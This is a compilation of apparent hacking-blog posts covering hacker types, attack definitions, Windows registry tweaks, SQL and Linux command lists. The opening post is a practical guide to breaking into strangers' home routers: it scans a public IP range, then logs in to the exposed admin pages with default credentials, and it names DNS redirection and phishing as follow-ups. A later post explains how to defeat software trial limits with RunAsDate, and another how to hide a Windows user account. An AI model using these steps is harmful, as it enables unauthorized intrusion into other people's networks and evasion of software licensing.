HOW TO RANDOMLY HACK A HOME ROUTERS?

we are going to show you how to use port scanner to identify home routers (and even office routers :p) and after that we will try to log in to those routers.

In the world most of users doesn’t change there router’s default password because most of them only know how to use without know how to configure the router itself.

So that’s the point. We can use that vulnerability to hack the routers.

Requirements:

Port Scanner (I use zenmap in this tutorial)
Web Browser (I use Google Chrome)
Internet Connection

First of all I want to tell you why I use Zenmap because Nmap is the best friend of hackers and Zenmap is the graphical user interface of nmap.

Step by Step How to Randomly Hack a Home Routers

1. We should select an IP range. I have selected IP range that includes my public IP address.

XXX.XXX.30.0-XXX.XXX.30.255

2. Now let’s scan for home routers.

When you finished your scan, You can find IP addresses which has open ports such as http port(80), ftp port(21) and telnet port(23).

I have found many IP addesses with port 80 is opened.

So I stopped my scan.

3. Now you can access these addesses using your web browser because http port is opened and we need to find whether the web page is router log in page.

4. If you see the alert error messages, it says TD-8817. So we can Google for it

search ‘TD-8817 default username and password’

5. Now let’s try to access these IP addresses using default logins we just got on step 4.

Default username and passwords are not same for every routers.

With username : admin and password : admin, we can log in to the router administration page

Attacker can do several harmful things when they can access router page, such as:

Redirecting DNS to malicious websites
Phishing Attacks
etc
Conclusion:

Because most of users doesn’t change their router passwords.

It’s a very bad habit because hackers can access your router form anyplace through internet when you are online and It is very harmful to you.

So you must change your home router’s password. Keep it on you mind.

Hope you found it useful 🙂

_________________________

HOW TO BECOME ETHICAL HACKER? {10 STEPS}

A hacker is basically someone who breaks into computer networks or standalone personal computer systems for the challenge of it or because they want to profit from their innate hacking capabilities.

The hacker subculture that has developed among these new-age outlaws is often defined as the computer underground, although as of late it has evolved into a more open society of sorts.

Today many of you want to become a hacker as everyone wants to see beyond security and private credentials.

So in this post i will tell you the best way to become Ethical Hacker

>> How To Become Certified Ethical Hacker ?

Today many businesses and government-related organizations that are serious about theirnetwork security hire ethical hackers and penetration testers to help probe and improve their networks, applications, and other computer systems with the ultimate goal of preventing data theft and fraud from that black hat and other hackers.

So you can earn through it by learning the ethical hacking.

There are many ways to become an ethicial hacker to get certified for that.

Below i have listed the ways to have knowledge about how the things actually works so you are able to hack it.

1.Programming

2.Networking

3.Encryption & Decryption

4.DBMS (Database Management System)

5.Linux/UNIX

6.Code in C Programming Language

7.Learn More Than One Programming Language

8.Learn More Than One OS (Operating Systems)

9.Experiment

After learning some concepts of hacking/cracking, sit and practice them.

Setup your own lab for experimental purpose.

You need a good computer system to start with as some tools may require powerful processor, RAM etc.

Keep on Testing and learning until you breach a system.

10.Continue Learning Continue Hacking

Learning is the key to success in the world of hacking. Continuous learning and practicing will make you the best hacker.

Keep yourself updated about security changes and learn about new ways to exploit systems
_________________________

TYPES OF HACKERS…..

Let’s see the categories of Hackers on the basis on their knowledge

>> Coders :

The Real Hackers are the Coders, the ones who revise the methods and create tools that are available in the market.

Coders can find security holes and weaknesses in software to create their own exploits.

These Hackers can use those exploits to develop fully patched and secure systems.

Coders are the programmers who have the ability to find the unique vulnerability in existing software and to create working exploit codes.

These are the individuals with a deep understanding of the OSI Layer Model and TCP/IP Stacks.

>> Admins :

Admins are the computer guys who use the tools and exploits prepared by the coders.

They do not develop their own techniques, however they uses the tricks which are already prepared by the coders.

They are generally System Administration, or Computer Network Controller.

Most of the Hackers and security person in this digital world come under this category.

Admins have experience with several operating systems, and know how to exploit several existing vulnerabilities.

A majority of Security Consultants fall in this group and work as a part of Security Team.

>> Script Kiddies :

Next and the most dangerous class of Hackers is Script kiddies, They are the new generation of users of computer who take advantage of the Hacker tools and documentation available for free on the Internet but don’t have any knowledge of what’s going on behind the scenes.

They know just enough to cause you headaches but typically are very sloppy in their actions, leaving all sorts of digital fingerprints behind.

Even though these guys are the teenage

Hackers that you hear about in the news media, they need minimum skills to carry out their attacks.

Script Kiddies are the bunnies who use script and programs developed by others to attack computer systems and Networks.

They get the least respect but are most annoying and dangerous and can cause big problems without actually knowing what they are doing.

>> Ethical Hacker :

Ethical Hacking is testing the resources for a good cause and for the betterment of technology.

Technically Ethical Hacking means penetration testing which is focused on Securing and Protecting IT Systems.

An Ethical Hacker exposes vulnerabilities in software to help business owners fix those security holes before a malicious hacker discovers them.

>> White Hat Hacker :

A White Hat Hacker is computer guy who perform Ethical Hacking.

These are usually security professionals with knowledge of hacking and the Hacker toolset and who use this knowledge to locate security weaknesses and implement countermeasures in the resources.

They are also known as an Ethical Hacker or a Penetration Tester.

They focus on Securing and Protecting IT Systems.

>> Black Hat Hackers :

A Black Hat Hacker is computer guy who performs Unethical Hacking.

These are the Criminal Hackers or Crackers who use their skills and knowledge for illegal or malicious purposes.

They break into or otherwise violate the system integrity of remote machines, with malicious intent.

These are also known as an Unethical Hacker or a Security Cracker.

They focus on Security Cracking and Data stealing.

>> Grey Hat Hackers :

A Grey Hat Hacker is a Computer guy who sometimes acts legally, sometimes in good will, and sometimes not.

They usually do not hack for personal gain or have amalicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits.

They are hybrid between White Hat and Black Hat Hackers.

>> Hactivism :

Another type of Hackers are Hacktivists, who try to broadcast political or social messages through their work.

A Hacktivist wants to raise public awareness of an issue.

Examples of hacktivism are the Web sites that were defaced with the Jihad messages in the name of Terrorism.

>> Cyber Terrorist :

There are Hackers who are called Cyber Terrorists, who attack government computers or public utility infrastructures, such as power stations and air-traffic-control towers.

They crash critical systems or steal classified government information.

While in a conflict with enemy countries some government start Cyber war via Internet.
_________________________

WHAT IS DNS HIJACKING?

DNS hijacking is a process in which an individual redirects queries to a domain name server (DNS).

It may be accomplished through the use of malicious software or unauthorized modification of a server.

Once the individual has control of the DNS, they can direct others who access it to a web page that looks the same, but contains extra content such as advertisements.

They may also direct users to pages containing malware or a third-party search engine.
_________________________

HACKERS VS. CRACKERS……

What Is the Difference Between a Hacker and a Cracker?

Many articles have been written about the difference between Hackers and crackers, which attempt to correct public misconceptions about hacking.

For many years, media has applied the word Hacker when it really means Cracker.

So the public now believe that a Hacker is someone who breaks into computer systems and steal confidential data.

This is very untrue and is an insult to some of our most talented Hackers.

>> HACKER:

A Hacker is a person who is interested in the working of any computer operating system.

Most often, Hackers are programmers.

Hackers obtain advanced knowledge of operating systems and programming languages.

They may know various security holes within systems and the reasons for such holes.

Hackers constantly seek further knowledge, share what they have discovered, and they never have intentions about damaging or stealing data.

>> CRACKER:

A Cracker is a person who breaks into other people systems, with malicious intentions.

Crackers gain unauthorized access, destroy important data, stop services provided by the server, or basically cause problems for their targets.

Crackers can easily be identified because their actions are malicious.

Whatever the case, most people give Hacker a negative outline.

Many malicious Hackers are electronic thieves.

Just like anyone can become a thief, or a robber, anyone can become a Hacker, regardless of age, gender, or religion.

Technical skills of Hackers varies from one to another.

Some Hackers barely know how to surf the Internet, whereas others write software that other Hackers depend upon.
_________________________

WHAT’S HACK,HACKING & HACKER?

Hacking is unauthorized use of computer and network resources.

(The term “hacker” originally meant a very gifted programmer.

In recent years though, with easier access to multiple systems, it now has negative implications.)

Computer Hackers have been around for so many years. Since the Internet became widely used in the World, We have started to hear more and more about hacking.

Only a few Hackers, such as Kevin Mitnick, are well known. In a world of Black and White, it’s easy to describe the typical Hacker.

A general outline of a typical Hacker is an Antisocial, Pimple-faced Teenage boy.

But the Digital world has many types of Hackers.

>> HACKERS.?

Hackers are human like the rest of us and are, therefore, unique individuals, so an exact profile is hard to outline.

The best broad description of Hackers is that all Hackers aren’t equal.

Each Hacker has Motives, Methods and Skills.

But some general characteristics can help you understand them.

Not all Hackers are Antisocial, Pimple-faced Teenagers.

Regardless, Hackers are curious about Knowing new things, Brave to take steps and they are often very Sharp Minded.

Hacker is a word that has two meanings:

1. Traditionally, a Hacker is someone who likes to play with Software or Electronic Systems.

Hackers enjoy Exploring and Learning how Computer systems operate. They love discovering new ways to work electronically.

2. Recently, Hacker has taken on a new meaning — someone who maliciously breaks into systems for personal gain.

Technically, these criminals are Crackers as Criminal Hackers. Crackers break into systems with malicious intentions.
_________________________

HOW HACKERS LOOK LIKE & WHAT THEY THINK?

Self-educated hackers are more respected in hacker’s community because that person is really interested in hacking and he passed a lot of things that are not teached in schools and college.

The most common things hackers do is computers electrical engineering, physics, mathematics, linguistics and philosophy.

However, like every developer is not the hacker, hackers do not always have the skills of programming, but someone of them have. 🙂

Clothing styles: Hackers dress simply, casually: jeans, T-shirt and shoes. T-shirts are usually with some humorous slogans.

today there are T-shirts with pictures of Penguin (trademark Linux) or daemon (BSD). A small number of hackers prefers hiking boots.

This prefer wearing of black clothes. Hackers care more about comfort, practicality and ease of maintenance of clothes. They hate business suits.

OTHER INTERESTS: Hobbies that hackers do are widespread. Mostly they like science fiction, music, medievalism, chess, war games and intellectual games of all types, logical puzzles and other areas that are closely related to hacking or that include linguistics and acting.

Hackers prefer cats than dogs. (It is widely believed that cats have the hacker nature).

All hackers have terrible handwriting.

Annoyed by stupid people, don’t like to listen soft music, or to watch television, except for cartoons and science fiction films.

They hate lies, incompetence and boredom.

ACTIVITY AND SPORT: The largest number of hackers are generally not engaged in physical activities.

Among those who practice them, interest in the sport is not big.Avoid team sports.

Hacker sports are always individual, including concentration and ability: cycling, auto racing, skating, sailing, hiking, gliding … Just to mention, HaCoder team play soccer and freestyle football, but don’t like to watch it on TV.

Most hackers do not use cigarettes and alcohol.

In 1995, there was a trend to drink exotic beers, influenced by Linus Torvalds who like Guinness.

The limited use of cannabis, LSD, Nitrus oxide was once more accepted.

On the other side they dont like to use drugs because brain damage.

Most hackers use the coffee and / or sugar or soda (Coke) to stay awake all night during the hacking.
_________________________

WHAT IS DND CACHE POISONING?

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in it’s path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.
_________________________

WHAT IS CLICKJACKING ATTACKS?

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.
_________________________

WHAT IS PACKET INJECTION?

Packet injection (also known as forging packets or spoofing packets) is a computer networking term that refers to the process of interfering with an established network connection,

by means of constructing packets to appear as if they are part of the normal communication stream.

The packet injection process allows an unknown third party to disrupt or intercept packets from the consenting parties that are communicating, which can lead to degradation or blockage of users’ ability to utilize certain network services or protocols.

Packet injection is commonly used in man-in-the-middle attacks and denial-of-service attacks.
_________________________

WHAT IS ISP HIJACKING?

DNS hijacking is also done by some Internet service providers, such as Comcast, so that they can link users to their own search pages,

when they visit a web page that no longer exists.

Many claim this is to improve the users experience; however, this can also be another great source of extra revenue since they control the site and get paid off any advertisement clicks.

Currently, there are no laws against an ISP doing this to its users.
_________________________

FACEBOOK TO HACKERS:-FIND BUG AND GET PAID….

Good news for hackers. Social networking giant Facebook has announced a bug bounty program, in which it will pay hackers for finding and reporting security flaws on its Web site.

People who can figure out significant problems with the site will get paid a hefty amount, starting at a base rate of $500.

The amount will go up as per the significance of the flaws found.

“If you believe you’ve found a security vulnerability on Facebook, we encourage you to let us know right away.

We will investigate all legitimate reports and do our best to quickly fix the problem,” Facebook says in its Whitehat page,

https://www.facebook.com/whitehat/

where researchers can sign up for the program and report bugs.

However, Mark Zuckerberg-led Facebook, has made one point clear that it will not pay all but those hackers/researchers who stick to its Responsible Disclosure Policy.n
Researchers will have to maintain privacy about any vulnerability issue until Facebook fixes the hitch.

“If you give us a reasonable time to respond to your report before making any information public and make a good faith effort to avoid privacy violations,

destruction of data and interruption or degradation of our service during your research, we will not bring any lawsuit against you or ask law enforcement to investigate you.”]n\n According to Facebook, only registered researchers will be allowed to set up test accounts to ensure that no terms have been violated and other Facebook users remain intact.

Facebook has hired many engineers after they came up with security bugs on the site.

Recently, the social networking juggernaut hired iPhone jailbreaker and Sony PlayStation 3 hacker George Hotz.

Hotz is now working on security issues related to the Web site.

The vulnerabilities that could qualify for the bounty include: Cross-Site Request Forgery (CSRF/XSRF), Cross-Site Scripting (XSS) and Remote Code Injection.

According to multiple reports, a CSRF vulnerability is being aggressively used to trap users into spreading a survey scam through a series of social engineering tricks.

The bugs that are excluded from the bounty program are: Security bugs in third-party applications, Security bugs third-party websites that integrate with Facebook, Security bugs in Facebook’s corporate infrastructure, Denial of Service Vulnerabilities and Spam or Social Engineering techniques.

Facebook is not the first company to offer bounties for bugs. Search engine giant Google, Mozilla and Hewlett-Packard (HP) also tried bug bounty programs.

Mozilla announced its bug bounty program in 2004, offering $500 to $3000 for every serious bug found by security researchers, Cnet reported.

Google announced cash for finding security holes in its Web site in 2010. Its payments range between $500 and $3,133.70, depending on the vulnerability of the problem.

_________________________

WHAT IS ZERO-DAY ATTACK?

One of the most common terms you will hear, a zero-day attack or zero-day exploit is simply the use of a previously undiscovered flaw in an application.

or operating system that can be exploited to gain access to or control system resources.

The term zero-day refers to the fact that it is the day on which the attack or exploit was first identified.
_________________________

ADD YOUR NAME IN DESKTOP CONTEXT MENU IN WINDOWS.

You can add your name at top of the menu and can open any program, Explorer, Documents folder or User Accounts by clicking on it.

So here is the step-by-step guide:

1. Type regedit in RUN or Start Menu search box and press Enter. It’ll open Registry Editor.

2. Now go to:

HKEY_CLASSES_ROOT–DesktopBackground–Shell

3. Now we’ll need to create a new key under Shell key. Right-click on Shell key and select New -> Key.

Give the new key any desired name e.g. Name (without quotes).

4. Now in right-side pane, change value of Default to your desired name which you want to show in Desktop context menu. We have chosen ~:: Spyboy ::~ in our example.

5. Now right-click on the new key which we created in step 3, e.g. Name and select New -> Key. Give the new key name of command.

6. In right-side pane, change value of Default to explorer.exe if you want to open Explorer by clicking on it. We have chosen Control userpasswords to open User Accounts applet in our example.

7. To set an icon for the shortcut, select the key created in Step 3 and in right-side pane, create a new String value Icon. Set its value to your desired icon. We have set it to imageres.dll,206 in our example.

To set its position in the context menu, create a new String value Position and set its value to:

Top (To show it at top)

Bottom (To show it at bottom)

We have set it at top.

8. That’s it. Now you can have your name with an icon in Desktop context menu. PS. If you want a ready-made registry script to do the task automatically, then copy paste following code in Notepad and save the file with name spyboy.shubham(including quotes). Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT–DesktopBackground–Shell–name]

@=~:: Spyboy ::~

Position=Top

[HKEY_CLASSES_ROOT–DesktopBackground–Shell–name–command]

@=Control userpasswords

Run the file and it’ll add the program shortcut in Desktop context menu.

To change the name, icon or associated application path,simply change the BOLD part in the script.
_________________________

HOW TO HACK TRIAL SOFTWARES TO USE THEM LIFETIME?

In this computer world we use lots of software in our desktops and laptops no matter we are in whatever field we always need software to do work.

And there are many software that are freely available for lifetime to make our work easy, but there are many of the software that come with only for limited trial period that is around 30 days or 60 days.

And after the free trial days you have to buy the key to use them more. And for key you have to pay money.

But we are here with a trick for How to Hack Trial Softwares to use them Lifetime.

Yes you can do this with a simple and straight method discussed below.

There is a perfect tool that will do this and the name of tool is RunAsDate.

download from here :

http://www.nirsoft.net/utils/run_as_date.html

With the help of this tool you can use any of software for free even after the trial period is over.

You just have to follow some of the simple steps discussed below

Now in your computer run the trial software and note down the date of installation.

Now when the trial version gets over do not directly launch the software, just right click on it and click run as and then select Runasdate there.

Thats it now the trial date will get injected to that software by this tool and you can access the software as long as you want.

And also everytime you open the just run as through this tool. Other wise this trick will not work.

So above is all about How to Hack Trial Softwares to use them Lifetime.

By this hack now you can easily use any of your favorite software for free for lifetime and you will not have to pay a single coin for this.
_________________________

TO PREVENT ACCESS TO CERTAIN DEVICES.

STEPS:Open regedit.exe file.

Scroll down to create the following registry key:

[HKEY_LOCAL_MACHINE–SOFTWARE–Microsoft–Windows–CurrentVersion–Policies–Explorer]

Under the Explorer key, in the right pane create a new DWORD value named NoViewOnDrive within the above registry key and set its data value to the number of the drive that you want to hide as per the below list:

A: 1 , B: 2 , C: 4 , D: 8 , E: 16 , F: 32 , G: 64 , H: 128 (ALL: 67108863)

NOTE: You may want to completely delete the DWORD value NoViewOnDrive when you want to enable access to certain drives.
_________________________

HOW TO ADD AN APPLICATION TO THE RIGHT CLICK MENU OF THE DESKTOP?

STEPS:Open regedit.exe file.

Scroll down to create the following registry key:

[HKEY_CLASSES_ROOT-Directory-Background-shell]

In the left side pane, right click on the shell key and create a new key called Paint.

In the left side pane, right click on the Paint key and create a new key called command.

Under the command key, in the right pane double click on the (Default) string key and change its data to: C:WindowsSystem32mspaint.exe

NOTE: Now when you right click on your desktop, a new menu item called Paint has been added to the context menu.
_________________________

HOW TO DISABLE THE CONTROL PANEL?

STEPS:Open regedit.exe file.

Scroll down to create the following registry key:v [HKEY_LOCAL_MACHINE–SOFTWARE–Microsoft–Windows–CurrentVersion–Policies–Explorer]

Under the Explorer key, in the right pane create a new DWORD value named NoControlPanel within the above registry key and set its data value to 1 to disable the windows hotkeys, and to 0 to enable it.

NOTE: You may want to completely delete the DWORD value NoControlPanel when you want to enable control panel.
_________________________

HOW TO DISABLE RIGHT CLICK ON WINDOWS?

Go to Start > Run > type ” regedit “.

Once in regedit go to

[HKEY_CURRENT_USER-Software-Microsoft-Windows-CurrentVersion-Policies-Explorer] which disables right click for only the current user or

[HKEY_LOCAL_MACHINE-Software-Microsoft-Windows-CurrentVersion-Policies-Explorer] which disables the right click for all users.

Now either modify or create a new DWORD value named NoViewContextMenu and set the value data to 1

Now, exit the registry, and restart your computer for the change to take effect.

SECOND METHOD:

Steps to resolve:

1. Go to Start >Run >Type “gpedit.msc” click OK.

2. Get to this location: User Configuration –> Administrative templates –> Windows Components –> Windows Explorer

3. In the right pane double click on : Remove Windows Explorer’s default context menu.

4. Select Disable and click OK.
_________________________

HOW TO CREATE A HIDDEN USER ACCOUNT?

1.This trick allows an account that is normally displayed on the Welcome screen to be hidden from view.

To log on using the account, it is necessary to use the Log On To Windows dialog box similar to the one in Windows 2000 i.e. press CTRL+ALT+DEL twice.

2.Start-> Run-> Regedit

3.Go to: HKEY_LOCAL_MACHINE-SOFTWARE-Microsoft-WindowsNT-CurrentVersion-Winlogon-SpecialAccou…nts-UserList

4.MODIFY/Create DWORD Value of Data type REG_DWORD Named [Type Name of Account to be Hidden]

Setting for Value Data: [0 = Account is Hidden / 1 = Enabled]

5.Exit Registry / Reboot

6.While the account is hidden on the Welcome screen, note that the account profile will be visible in C:Documents and Settings or wherever user profiles are stored as well as in Local Users and GroupsSee more.

With this trick, you can create a hidden user account in windows 7 or Windows 8.
_________________________

HOW TO DISABLE OR ENABLE USB PORT IN WINDOWS?

Disable Or Enable USB Port

Many of us always want to secure our system from unwanted user.

If you want to secure your system to disable USB follow these simple steps.

Step1. Go to start>Run & type here Regedit. Now your registry editor will open.

Step2. Now find this key in registry editor.

HKEY_LOCAL_MACHINE-SYSTEM-CurrentControlSet-Services-USBSTOR

Step3. On the right side penal find Star & double click on it to modify it. give it the value 4. Then close registry editor & restart your computer.

To enable USB port change the value with

With This Trick, you Can Easily Disable or Enable USB ports in Windows
_________________________

TURN ON YOUR PCVERY FAST AS LESS THAN IN 10 SECONDS.

I am going to tell you something very cool, interesting and very useful.

Alright so you wanna know how to Turn ON your PC very fast as less then in 10 seconds.

Here’s what you have to do to Turn your PC ON in 10 seconds.

Y ou have to do these following steps:-

1.Click on the START button then,

2.Go to RUN.

3.type Regedit and hit Enter.

4.this will open Registery Editor

5.Now look for the below key

HKEY_LOACAL_MECHINE-SYSTEM-CurrentControlSet-Control

ContentIndex

6.Now there find the Key Called “Startup Delay” Double Click On It.

7.Now where its Base Click Decimal.

8.Now its Default Value Is 4800000(75300:hexadecimal)

9.Change The Value To 40000 and click on OK

10.Now close the Registery Editor.

11.Now Y ou have Done it and Restart your PC and check the speed.

=======DO IT ON YOUR RISK!!==========
_________________________

SQL COMMANDS LISTS.

SQL, ‘Structured Query Language’, is a programming language designed to manage data stored in relational databases.

SQL operates through simple, declarative statements.

This keeps data accurate and secure, and helps maintain the integrity of databases, regardless of size.

Here’s an appendix of commonly used commands.

COMMANDS

ALTER TABLE

ALTER TABLE table_name ADD column datatype;
ALTER TABLE lets you add columns to a table in a database.

AND

SELECT column_name(s)
FROM table_name
WHERE column_1 = value_1
AND column_2 = value_2;
AND is an operator that combines two conditions. Both conditions must be true for the row to be included in the result set.
AS

SELECT column_name AS ‘Alias’
FROM table_name;
AS is a keyword in SQL that allows you to rename a column or table using an alias.

AVG

SELECT AVG(column_name)
FROM table_name;
AVG() is an aggregate function that returns the average value for a numeric column.

BETWEEN

SELECT column_name(s)
FROM table_name
WHERE column_name BETWEEN value_1 AND value_2;
The BETWEEN operator is used to filter the result set within a certain range. The values can be numbers, text or dates.

COUNT

SELECT COUNT(column_name)
FROM table_name;
COUNT() is a function that takes the name of a column as an argument and counts the number of rows where the column is not NULL.

CREATE TABLE

CREATE TABLE table_name (column_1 datatype, column_2 datatype, column_3 datatype);
CREATE TABLE creates a new table in the database. It allows you to specify the name of the table and the name of each column in the table.

DELETE

DELETE FROM table_name WHERE some_column = some_value;
DELETE statements are used to remove rows from a table.
GROUP BY

SELECT COUNT(*)
FROM table_name
GROUP BY column_name;
GROUP BY is a clause in SQL that is only used with aggregate functions. It is used in collaboration with the SELECT statement to arrange identical data into groups.

INNER JOIN

SELECT column_name(s) FROM table_1
JOIN table_2
ON table_1.column_name = table_2.column_name;
An inner join will combine rows from different tables if the join condition is true.

INSERT

INSERT INTO table_name (column_1, column_2, column_3) VALUES (value_1, ‘value_2’, value_3);
INSERT statements are used to add a new row to a table.

LIKE

SELECT column_name(s)
FROM table_name
WHERE column_name LIKE pattern;
LIKE is a special operator used with the WHERE clause to search for a specific pattern in a column.

LIMIT

SELECT column_name(s)
FROM table_name
LIMIT number;
LIMIT is a clause that lets you specify the maximum number of rows the result set will have.

MAX

SELECT MAX(column_name)
FROM table_name;
MAX() is a function that takes the name of a column as an argument and returns the largest value in that column.

MIN

SELECT MIN(column_name)
FROM table_name;
MIN() is a function that takes the name of a column as an argument and returns the smallest value in that column.

OR

SELECT column_name
FROM table_name
WHERE column_name = value_1
OR column_name = value_2;
OR is an operator that filters the result set to only include rows where either condition is true.
v ORDER BY

SELECT column_name
FROM table_name
ORDER BY column_name ASC|DESC;
ORDER BY is a clause that indicates you want to sort the result set by a particular column either alphabetically or numerically.

OUTER JOIN

SELECT column_name(s) FROM table_1
LEFT JOIN table_2
ON table_1.column_name = table_2.column_name;
An outer join will combine rows from different tables even if the the join condition is not met. Every row in the left table is returned in the result set, and if the join condition is not met, then NULL values are used to fill in the columns from the right table.
ROUND
v SELECT ROUND(column_name, integer)
FROM table_name;v ROUND() is a function that takes a column name and an integer as an argument. It rounds the values in the column to the number of decimal places specified by the integer.

SELECT

SELECT column_name FROM table_name;
SELECT statements are used to fetch data from a database. Every query will begin with SELECT.

SELECT DISTINCT

SELECT DISTINCT column_name FROM table_name;
SELECT DISTINCT specifies that the statement is going to be a query that returns unique values in the specified column(s).

SUM

SELECT SUM(column_name)
FROM table_name;
SUM() is a function that takes the name of a column as an argument and returns the sum of all the values in that column.

UPDATE

UPDATE table_name
SET some_column = some_value
WHERE some_column = some_value;
UPDATE statments allow you to edit rows in a table.

WHERE

SELECT column_name(s)
FROM table_name
WHERE column_name operator value;
WHERE is a clause that indicates you want to filter the result set to include only rows where the following condition is true.

Hope this help you.
_________________________

TO BASIC UBUNTU COMMANDS THAT EVERY LINUX NEWBIES SHOULD REMEMBER.

So let’s get started with the list of 10 Linux Basic commands –

1. sudo

This SuperUserDo is the most important command Linux newbies will use. Every single command that needs root’s permission, need this sudo command. You can use sudo before each command that requires root permissions –

$ sudo su

2. ls (list)

Just like the other, you often want to see anything in your directory. With list command, the terminal will show you all the files and folders of the directory that you’re working in. Let’s say I’m in the /home folder and I want to see the directories & files in /home.

/home$ ls

ls in /home returns the following –

imad lost+found

3. cd

Changing directory (cd) is the main command that always be in use in terminal. It’s one of the most Linux basic commands. Using this is easy. Just type the name of the folder you want to go in from your current directory. If you want to go up just do it by giving double dots (..) as the parameter.

Let’s say I’m in /home directory and I want to move in usr directory which is always in the /home. Here is how I can use cd commands –

/home $ cd usr

/home/usr $

4. mkdir

Just changing directory is still incomplete. Sometimes you want to create a new folder or subfolder. You can use mkdir command to do that. Just give your folder name after mkdir command in your terminal.

~$ mkdir folderName

5. cp

copy-and-paste is the important task we need to do to organize our files. Using cp will help you to copy-and-paste the file from terminal. First, you determine the file you want to copy and type the destination location to paste the file.

$ cp src des

Note: If you’re copying files into the directory that requires root permission for any new file, then you’ll need to use sudo command.

6. rm

rm is a command to remove your file or even your directory. You can use -f if the file need root permission to be removed. And also you can use -r to do recursive removal to remove your folder.

$ rm myfile.txt

7. apt-get

This command differs distro-by-distro. In Debian based Linux distributions, to install, remove and upgrade any package we’ve Advanced Packaging Tool (APT) package manager. The apt-get command will help you installing the software you need to run in your Linux. It is a powerful command-line tool which can perform installation, upgrade, and even removing your software.

In other distributions, such as Fedora, Centos there are different package managers. Fedora used to have yum but now it has dnf.

$ sudo apt-get update

$ sudo dnf update

8. grep

You need to find a file but you don’t remember its exact location or the path. grep will help you to solve this problem. You can use the grep command to help finding the file based on given keywords. $ grep user /etc/passwd

9. cat

As a user, you often need to view some of text or code from your script. Again, one of the Linux basic commands is cat command. It will show you the text inside your file. $ cat CMakeLists.txt

10. poweroff

And the last one is poweroff. Sometimes you need to poweroff directly from your terminal. This command will do the task. Don’t forget to add sudo at the beginning of the command since it needs root permission to execute poweroff.

$ sudo poweroff

hope this help you.
_________________________

KALI LINUX COMMANDS.

A-Z of Kali Linux commands are here below:

From A

apropos – Search Help manual pages (man -k)

apt-get – Search for and install software packages (Debian)

aptitude – Search for and install software packages (Debian)

aspell – Spell Checker

awk – Find and Replace text, database sort/validate/index

From B

basename – Strip directory and suffix from filenames

bash – GNU Bourne-Again SHell

bc – Arbitrary precision calculator language

bg – Send to background

break – Exit from a loop

builtin – Run a shell builtin

bzip2 – Compress or decompress named file(s)

From – C

cal – Display a calendar

case – Conditionally perform a command

cat – Concatenate and print (display) the content of files

cd – Change Directory

cfdisk – Partition table manipulator for Linux

chgrp – Change group ownership

chmod – Change access permissions

chown – Change file owner and group

chroot – Run a command with a different root directory

chkconfig – System services (runlevel)

cksum – Print CRC checksum and byte counts

clear – Clear terminal screen

cmp – Compare two files

comm – Compare two sorted files line by line

command – Run a command – ignoring shell functions

continue – Resume the next iteration of a loop

cp – Copy one or more files to another location

cron – Daemon to execute scheduled commands

crontab – Schedule a command to run at a later time

csplit – Split a file into context-determined pieces

cut – Divide a file into several parts

From D

date – Display or change the date & time

dc – Desk Calculator

dd = Convert and copy a file, write disk headers, boot records

ddrescue -Data recovery tool

declare – Declare variables and give them attributes

df – Display free disk space

diff – Display the differences between two files

diff3 – Show differences among three files

dig – DNS lookup

dir – Briefly list directory contents

dircolors – Colour setup for `ls’

dirname – Convert a full pathname to just a path

dirs – Display list of remembered directories

dmesg – Print kernel & driver messages

du – Estimate file space usage

From E

echo – Display message on screen

egrep – Search file(s) for lines that match an extended expression

eject – Eject removable media

enable – Enable and disable builtin shell commands

env – Environment variables

ethtool – Ethernet card settings

eval – Evaluate several commands/arguments

exec – Execute a command

exit – Exit the shell

expect – Automate arbitrary applications accessed over a terminal

expand -Convert tabs to spaces

export – et an environment variable

expr – Evaluate expressions

From F

false – Do nothing, unsuccessfully

fdformat – Low-level format a floppy disk

fdisk – Partition table manipulator for Linux

fg – Send job to foreground

fgrep – Search file(s) for lines that match a fixed string

file – Determine file type

find – Search for files that meet a desired criteria

fmt – Reformat paragraph text

fold – Wrap text to fit a specified width.

for – Expand words, and execute commands

format -Format disks or tapes

free – Display memory usage

fsck – File system consistency check and repair

ftp – File Transfer Protocol

function – Define Function Macros

fuser – Identify/kill the process that is accessing a file

From G

gawk – Find and Replace text within file(s)

getopts – Parse positional parameters

grep – Search file(s) for lines that match a given pattern

groupadd – dd a user security group

groupdel – Delete a group

groupmod – Modify a group

groups – Print group names a user is in

gzip – Compress or decompress named file(s)

Frpm H

hash – Remember the full pathname of a name argument

head – Output the first part of file(s)

help – Display help for a built-in command

history – Command History

hostname – Print or set system name

From I

iconv – Convert the character set of a file

id – Print user and group id’s

if – Conditionally perform a command

ifconfig – Configure a network interface

ifdown – Stop a network interface

ifup – Start a network interface up

import – Capture an X server screen and save the image to file

install – Copy files and set attributes

From J

jobs – List active jobs

join – Join lines on a common field

From K

kill – Stop a process from running

killall – Kill processes by name

From L

less – Display output one screen at a time

let – Perform arithmetic on shell variables

ln – Create a symbolic link to a file

local – Create variables

locate – Find files

logname – Print current login name

logout – Exit a login shell

look – Display lines beginning with a given string

lpc – Line printer control program

lpr – Off line print

lprint – Print a file

lprintd – Abort a print job

lprintq – List the print queue

lprm – Remove jobs from the print queue

ls – List information about file(s)

lsof – List open files

From M

make – Recompile a group of programs

man – Help manual

mkdir – Create new folder(s)

mkfifo – Make FIFOs (named pipes)

mkisofs – Create an hybrid ISO9660/JOLIET/HFS filesystem

mknod – Make block or character special files

more – Display output one screen at a time

mount – Mount a file system

mtools – Manipulate MS-DOS files

mtr – Network diagnostics (traceroute/ping)

mv – Move or rename files or directories

mmv – Mass Move and rename (files)

From N

netstat – Networking information

nice – Set the priority of a command or job

nl – Number lines and write files

nohup – Run a command immune to hangups

notify-send – Send desktop notifications

nslookup – Query Internet name servers interactively

From O

open – Open a file in its default application

op – Operator access

From P

passwd – Modify a user password

paste – Merge lines of files

pathchk – Check file name portability

ping – Test a network connection

pkill – Stop processes from running

popd – Restore the previous value of the current directory

